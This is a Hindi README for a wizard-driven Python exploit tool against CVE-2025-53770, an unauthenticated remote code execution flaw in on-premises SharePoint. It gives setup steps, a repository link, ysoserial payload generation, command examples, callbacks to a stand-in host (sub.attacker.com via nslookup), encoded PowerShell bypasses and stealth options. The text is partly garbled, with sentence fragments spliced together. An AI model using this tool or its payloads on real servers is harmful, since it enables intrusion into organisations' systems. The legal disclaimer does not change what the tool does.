
CVE-2025-53770 को लक्षित करने वाला एक परिष्कृत, विज़ार्ड-संचालित पायथन एक्सप्लॉइट टूल, जो ऑन-प्रिमाइसेस माइक्रोसॉफ्ट शेयरपॉइंट सर्वर (2016, 2019, सब्सक्रिप्शन एडिशन) में एक गंभीर (CVSS 9.8) अप्रमाणित रिमोट कोड निष्पादन (RCE) कमजोरी है।
डिवाइन एब्सोल्यूट एक उन्नत, विज़ार्ड-चालित Python एक्सप्लॉइट टूल है जो CVE-2025-53770 को लक्षित करता है, जो ऑन-प्रिमाइसेस Microsoft SharePoint Server (2016, 2019, Subscription Edition) में एक गंभीर (CVSS 9.8) अनधिकृत रिमोट कोड निष्पादन (RCE) भेद्यता है। यह भेद्यता, जो 19 जुलाई, 2025 को एक जीरो-डे के रूप में सामने आई, /_layouts/15/ToolPane.aspx में अविश्वसनीय डेटा के डिसीरियलाइज़ेशन से उत्पन्न होती है। यह टूल केवल नैतिक पेनिट्रेशन टेस्टिंग और अधिकृत सुरक्षा अनुसंधान के लिए डिज़ाइन किया गया है, जो अन्वेषण, शोषण और सत्यापन के लिए बेजोड़ सटीकता, गुप्तता और अनुकूलनशीलता प्रदान करता है।
रिपॉजिटरी: https://github.com/exfil0/CVE-2025-53770
⚠️ कानूनी चेतावनी: यह टूल केवल नियंत्रित वातावरण में स्पष्ट अनुमति के साथ वैध, अधिकृत उपयोग के लिए है। उन प्रणालियों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की अनुमति नहीं है, अवैध है और इसके गंभीर कानूनी परिणाम हो सकते हैं। लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानता है।
16.0.0.\d+-\w+?) के साथ SharePoint उपस्थिति, संस्करण और ToolPane.aspx पहुंच का पता लगाता है।ToolPane.aspx के माध्यम से पेलोड डिलीवर करता है।WebRequest.Create, Dns.GetHostEntry) के लिए वैकल्पिक pythonnet।-enc) पेलोड शामिल हैं।/xp.aspx, UUID-आधारित)।www.google.com), कस्टम URL, या आंतरिक SharePoint पथ (जैसे /_layouts/15/sharepoint.aspx)।RequestException पर पुनर्प्रयास, और अनुकूलन योग्य स्थिति कोड/पथ के साथ मज़बूत RCE पुष्टि।MicrosoftSharePointTeamServices), पथ (जैसे /versions.aspx), और regexes के माध्यम से उन्नत SharePoint पहचान।/_layouts/15/ToolPane.aspx में डिसीरियलाइज़ेशन के माध्यम से अनधिकृत RCE।/ToolPane.aspx POSTs की निगरानी करें, WAF नियमों (जैसे Cloudflare) का उपयोग करें।pip install requests termcolor
pip install pythonnet
ysoserial.exe को एक ज्ञात पथ पर रखें (जैसे ./ysoserial.exe)।# Ubuntu/Debian
sudo apt-get install mono-complete
# macOS (Homebrew के माध्यम से)
brew install mono
docker pull mcr.microsoft.com/sharepoint/server:2019
git clone https://github.com/exfil0/CVE-2025-53770.git
cd CVE-2025-53770
pip install -r requirements.txt
ysoserial.exe सुलभ है या निष्पादन के दौरान उसका पथ प्रदान करें।इंटरैक्टिव विज़ार्ड चलाएँ:
python divine_absolute.py
Recon: SharePoint उपस्थिति और संस्करण के लिए स्कैन करता है।Exploit: ToolPane.aspx पर पेलोड भेजता है।Full: रीकॉन + एक्सप्लॉइट (वैकल्पिक आक्रामक मोड)।https://sharepoint.example.com)।ObjectDataProvider), और कमांड (जैसे cmd /c whoami) निर्दिष्ट करें।http://attacker.com/callback या sub.attacker.com)।NONE, BASIC_REFLECTION, , या कस्टम स्निपेट चुनें।python divine_absolute.py
# चुनें: Mode=Recon, Target=https://sharepoint.example.com
python divine_absolute.py
# चुनें: Mode=Exploit, Target=https://sharepoint.example.com, Payload=YSOSERIAL,
# ysoserial.exe path=./ysoserial.exe, Gadget=ObjectDataProvider,
# Command="cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"
python divine_absolute.py
# चुनें: Mode=Full, Target=target_list.txt, Payload=FILE, Payload File=payload.b64,
# Verify Path=/sitepages/out.txt, Regexes="COMPUTERNAME", Status Codes=200
python divine_absolute.py
# चुनें: Mode=Exploit, Payload=PINGBACK, Pingback URL=sub.attacker.com
परिणाम xanthorox_results.json में सेव होते हैं जिनमें फ़ील्ड होते हैं:
target: परीक्षण किया गया URL।sharepoint_detected: बूलियन।toolpane_accessible: बूलियन।exploited: बूलियन (पेलोड भेजा गया)।verified_rce: बूलियन/कोई नहीं (RCE पुष्टि)।error: कोई भी त्रुटि सामने आई।उदाहरण:
[
{
"target": "https://sharepoint.example.com",
"sharepoint_detected": true,
"toolpane_accessible": true,
"exploited": true,
"verified_rce": true,
"error": null
}
]
यह संस्करण निम्नलिखित को ठीक करता है:
-enc) कमांड में बायपास को डिकोड और इंजेक्ट करता है; गैर-PowerShell (जैसे cmd.exe) को चेतावनी के साथ समर्थन करता है।Dns.GetHostEntry के साथ pythonnet का उपयोग करता है (प्रायोगिक, पूर्ण प्रभाव के लिए गैजेट की आवश्यकता है)।ysoserial.exe -f LosFormatter -g ObjectDataProvider -c "cmd /c nslookup sub.attacker.com" -o base64 के साथ पेलोड उत्पन्न करें और DNS लॉग सत्यापित करें।pythonnet में Dns.GetHostEntry विशिष्ट गैजेट श्रृंखला के बिना ट्रिगर नहीं हो सकता है।योगदान का स्वागत है! कृपया:
git checkout -b feature/awesome-improvement)।git commit -m "Add awesome improvement")।git push origin feature/awesome-improvement)।यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है। विवरण के लिए LICENSE देखें।
नोट: उपयोग से पहले हमेशा नियंत्रित लैब में पेलोड और कॉन्फ़िगरेशन सत्यापित करें। नैतिक और कानूनी रहें।
CONCAT_OBFUSCATEDNONE, FIXED (जैसे /xp.aspx), RANDOM (UUID-आधारित)।DEFAULT_SP, NO_REFERER, RANDOM_EXTERNAL, CUSTOM_URL।http://127.0.0.1:8080)।/sitepages/result.txt), regexes (जैसे Xanthorox.*), स्थिति कोड (जैसे 200,403), प्रयास, विलंब और टाइमआउट निर्दिष्ट करें।